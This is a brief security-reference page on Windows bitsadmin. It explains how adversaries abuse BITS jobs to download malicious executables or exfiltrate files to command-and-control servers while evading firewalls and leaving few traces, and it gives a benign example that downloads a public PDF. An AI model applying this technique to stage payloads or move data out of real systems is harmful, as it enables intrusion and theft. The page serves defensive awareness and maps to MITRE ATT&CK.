Bitsadmin

Introduction

Bitsadmin (Background Intelligent Transfer Service - BITS) is a Windows command line tool used to create, download or upload jobs and to monitor their progress.

Any adversary with malicious intent can use this in-built tool to download a malicious executable or upload a sensitive file to Command & Control (C2) server. BITS tasks are self-contained in the BITS job database, without new files or registry modifications, and often permitted by host firewalls.

This is used by threat actor groups like APT39, APT41.

Download a file using Bitsadmin

Here is a simple example showing how bitsadmin can be used to download a file from internet.

  • Creating a job

bitsadmin /create myJob

  • Using the job to download a file

bitsadmin /transfer myJob /download https://packetlife.net/media/library/23/common-ports.pdf C:\Users\xyz\Downloads\common-ports.pdf

bitsadmin execution
bitsadmin execution status

References

LogobitsadminMicrosoftLearn
bitsadmin official page
LogoExfiltration Over Alternative Protocol: Exfiltration Over Unencrypted Non-C2 Protocol, Sub-technique T1048.003 - Enterprise | MITRE ATT&CK®attack.mitre.org
MITRE Technique T1048.003
LogoBITS Jobs, Technique T1197 - Enterprise | MITRE ATT&CK®attack.mitre.org
MITRE Technique T1197

Last updated